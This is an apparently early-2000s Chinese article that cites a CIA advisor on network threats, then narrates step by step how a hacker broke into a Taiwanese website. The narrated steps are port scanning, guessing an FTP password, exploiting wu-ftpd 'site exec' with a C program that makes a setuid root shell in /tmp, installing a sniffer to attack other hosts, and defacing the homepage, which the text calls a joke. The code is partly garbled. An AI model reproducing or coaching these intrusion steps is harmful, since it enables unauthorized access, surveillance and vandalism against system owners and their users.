据中国日报网站的消息:美国中央情报局(CIA)科技事务顾问劳伦斯·格斯文。2001年6月21日表示,美国官方网络所面临的最大威胁来自外国政府,而不是恐怖分子或单纯的捣蛋分子。他分析道,要袭击美国的电讯或财政系统网络,单个黑客暂时还不具备这种技术,也没有这样的企图。而由于恐怖份子总是“急功近利”,企图能够立刻收到预期效果,因此,他们目前仍然从事诸如爆炸之类的袭击活动,而“不屑于”“黑”网络。尽管中央情报局已经加强了网络安全防范,但是仍然无法预测黑客的袭击。黑客的技术和手段发展之快是中央情报局所赶不上的。
据美联社报道,预测并防范美国官方网络遭到以政治或军事为目的的袭击,这是中央情报局的职责之一。劳伦斯·格斯文说“我们每次总是在被黑客‘黑’了之后才恍然大悟。我对我们的预测能力表示怀疑。”
为什么劳伦斯·格斯文要对中央情报局的预测能力表示怀疑呢?黑客又是怎样来进行攻击的呢?下面,我们不妨来举一个例子,看一看这位黑客是怎样攻击台湾网站的。
首先,这位黑客先用HAKTEK扫了一下PORT,发现这个网站开的端口不少,像TELNET、FTP、FINGER都开了。在这种情况下,成功的可能性就要大一些。于是他打开浏览器,看看它的主页,看到在其最后有一个联系人E-mail:support@xxx。xxx。xxx。
FTP过去,帐号用support,密码也用support,失败。密码用support123,失败。密码用support1234,又失败。经过了n次失败,最后被他用sup做密码,成功进入了。
进入后敲gcc看一下,能够用C编译器,表明这时候已经成功了60%。这个系统版本为SUNOS5.5.1,很普通。于是他急急忙忙地去各个黑站找exploits。没想到,这个系统的exploits这么少,好几天后才在一个黑客站点找到了3个exploits,就急忙把exploits上传。令人没有想到的是,好不容易找到的exploits居然没法编译成功,3个exploits编译时都显示出错。由于那3个C程序里都有一串UNIX机器码,所以他也看不懂是错在哪里,只好想别的办法了。telnet localhost25看一下,本来希望出现sendmail x。x的提示信息,没想到却出现了一大堆奇怪的信息,看来对方这个管理员很狡猾,修改了提示信息,故意让人看不出sendmail版本。他再一次FTP过去,发现它的FTPD居然是wu-ftp2.x,这么大的漏洞当然要试一下了。
wu-ftp2.x的漏洞是最容易成功的了。先编译一个C程序 wu。c#include#include#include main(){seteuid(0);system(“cp/bin/sh/tmp/。sh”);system(“chmod6777/tmp/。sh”);system(“chown root/tmp/。sh”);system(“chmod4755/tmp/。sh”);system(“chmod+s/tmp/。sh”);。这个程序很短,编译时没有出错。然后chmod a+x wu FTP过去,用这个命令检验是否可以利用这个漏洞,quote“site exec bash-c id”200-bash-c id200-uid=0(root)gid=0(root)euid=101(funky)egid=50(users)groups=50(users)200(end of‘bash-c id’)(一旦出现euid=0就成功了!)
然后执行quote“site exec bash-c/export/home/myname/wu”,再用TELNET进入,执行/tmp/。sh。哈!终于看到了盼望已久的#提示符,已经成为root啦!
考虑到要借助它攻击其他网站,再安装SNIFFER,不要被网管发现才好。最后修改他的主页,这也不算破坏,开个玩笑嘛!
攻击终于到此就算结束。